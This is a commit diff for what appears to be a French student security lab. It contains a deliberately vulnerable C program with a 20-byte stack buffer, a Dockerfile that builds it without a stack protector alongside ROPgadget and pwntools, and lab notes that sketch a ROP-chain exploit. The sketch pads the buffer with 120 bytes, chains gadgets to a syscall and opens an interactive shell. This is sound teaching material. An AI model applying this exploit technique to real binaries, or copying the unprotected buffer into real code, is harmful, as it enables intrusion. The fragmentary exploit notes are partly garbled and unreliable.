✨ PRESQUE FINI

Bufferoverflow/main.c

@@ -1,12 +1,9 @@
 #include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
 
-void secretFunction()
+void check()
-{
-    printf("Congratulations!\n");
-    printf("You have entered in the secret function!\n");
-}
-
-void echo()
 {
     char buffer[20];
     printf("Enter some text:\n");
@@ -16,6 +13,8 @@ void echo()
 
 int main()
 {
-    echo();
+    check();
     return 0;
 }
+
+//python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain

Dockerfile

@@ -1,16 +1,17 @@
 FROM ubuntu:latest
 
 RUN apt-get update && \
-    apt install -y python3 gcc musl-dev python3-pip && \
+    apt install -y python3 gcc musl-dev python3-pip gdb nano && \
     python3 -m pip install ROPgadget && \
-    python3 -m pip install capstone
+    python3 -m pip install capstone && \
+    python3 -m pip install pwntools
 
 COPY Bufferoverflow /root/Bufferoverflow
 COPY ROPgadget /root/ROPgadget
 
 WORKDIR /root/Bufferoverflow
 
-RUN gcc main.c -o binaire -fno-stack-protector
+RUN gcc main.c -o binaire -fno-stack-protector -ggdb -Wl,-z,relro,-z,now,-z,noexecstack -static
 
 WORKDIR /root
 

TP.txt

@@ -1,2 +1,21 @@
 Combien de gadgets possède le binaire nommé "binaire" dans le dossier Bufferoverflow ?
 
+---
+
+docker build . -t secu
+
+docker run --rm -it secu
+
+---
+
+python3 ROPgadget/ROPgadget.py --binary Bufferoverflow/binaire --ropchain
+
+dans un fichier python : 
+    p = b'A' * 120 => buffer overflow
+    p += pack('<Q', 0x0000000000495f90) # add rax, 1 ; ret => p += p64(0x0000000000401fa4) # syscall : on convertit en p64 car la convertion est nul 
+
+    r.process("./binaire") => on execute le binaire
+    r.sendline(p) => on met dans le buffer toutes les adresses et l'attaque Bufferoverflow
+    r.interactive() => on met a disposition le shell interactif sur le terminal
+
+